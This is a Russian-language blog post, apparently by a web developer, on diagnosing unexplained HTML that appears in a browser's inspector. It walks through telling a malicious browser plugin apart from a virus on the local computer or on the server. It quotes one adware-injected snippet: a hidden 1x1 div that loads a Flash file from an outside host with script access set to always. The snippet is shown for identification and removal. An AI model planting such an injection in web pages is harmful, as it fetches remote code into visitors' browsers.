Отгадайте Карельскую народную загадку: "Что за олень в доме?" Этот вопрос, только немного перефразированный, наверняка задавал себе каждый вебщик, исследуя свой сформированный html код инспектором браузера. Бывало? Если причина правда не в программисте, искать её нужно в сторонних программах. И мне пришла идея создать на блоге страничку, на которую я бы складывал такие зловредные коды и методы борьбы с ними в надежде, что она проиндексируется и поможет ещё кому-то. Вот она! Кстати, ответ на загадку - в конце статьи :)
Распространённые причины неизвестного html кода
Программисты настолько привыкли, что в процессе отладки они наблюдают косяки и глюки, что, увидев чужеродный код на странице, сразу начинают искать ошибку у себя. Как-то не сразу въезжает в голову, что к тому, что выводит браузер, могут приложить руку ещё и сторонние программы. Именно по этой причине я поместил эту страничку в раздел про софт, а не в раздел о программировании.
- Даннный код присутствует и на других сайтах?
- "Да" - это показатель в пользу зловредного вируса на компе или зловредного плагина в браузере
- "Нет" - это показатель в пользу зловредного вируса на сервере
- Проверьте, присутствует ли он в исходном коде страницы (Ctrl + U)
- "Да" - это показатель в пользу зловредного вируса на сервере
- "Нет" - это показатель в пользу зловредного вируса на компе или зловредного плагина в браузере
- Есть ли этот код в других браузерах
- "Да" - это показатель в пользу зловредного вируса на компе / сервере или же зловредный плагин установился во все браузеры
- "Нет" - это показатель в пользу зловредного плагина в браузере
Зловредный плагин браузера
Прежде чем очертя голову начинать искать вирусы на сайте, проверьте свой браузер на предмет неопознанных летающих плагинов. Разные программы при установке любят пихать в браузеры зловредные плагины. При установке нового софта проверяйте все "галочки" - не установится ли вместе с программой этакий гад?
Зловредный вирус на компьютере
Надеюсь, что пользоваться антивирусом все умеют? Именно вирусы на компе часто являются причиной появления в браузере непонятной рекламы, говнобаннеров и порноредиректов, добавляя в тело страниц непонятный код.
Вирус на сервере в большинстве случаев является следствием наличия вируса на компьютере у программиста. Как правило, это следствие хранения ssh и ftp паролей в памяти клиентов типа FileZilla или WinSCP. Medice, cura te ipsum. Прежде чем начинать "лечить" сервер, "вылечи" свой компьютер, поменяй все ftp и ssh пароли, и только потом берись за серверную часть.Зловредный вирус на сервере
Чтобы выяснить, не пробрался ли какой-нибудь вредитель на сервер, нужно поискать вхождения постороннего кода в исходниках. Предупреждаю, что код не обязательно должен быть именно в том месте, где он виден в браузере, поэтому стоит поискать по всем файлам. Для массового поиска текста существует замечательная программа - Text Replacer. Этой же программой можно и массово удалить зловредный код из всех файлов. Массово проверить код можно так же антивирусом, но вот "лечить" им рискованно - код может потом и не заработать.
Зловредный код #1
А вот и он - виновник торжества, точнее, виновник того, что я пишу этот пост. Читал в интернете, что в поисках ответа некоторые люди неделями искали у себя вирус и перелопачивали кучу кода. Этот засранец добавлял какую-то непонятную пустую полоску между футером и нижним краем окна браузера. Для чего он был сделан, я даже знать не хочу:
<div id="dp_swf_engine" style="position: absolute; width: 1px; height: 1px;"><object width="1" height="1" type="application/x-shockwave-flash" data="http://www.ajaxcdn.org/swf.swf" id="_dp_swf_engine" style="width: 1px; height: 1px;"><param name="allowscriptaccess" value="always"></object></div>
В данном случае это был плагин "Website Recommendation" или "Dislike It". Стандартное лечение зловредного плагина подойдёт: найти и уничтожить!
Да, кстати, вот обещанный ответ: это стол. Теперь и вы это знаете!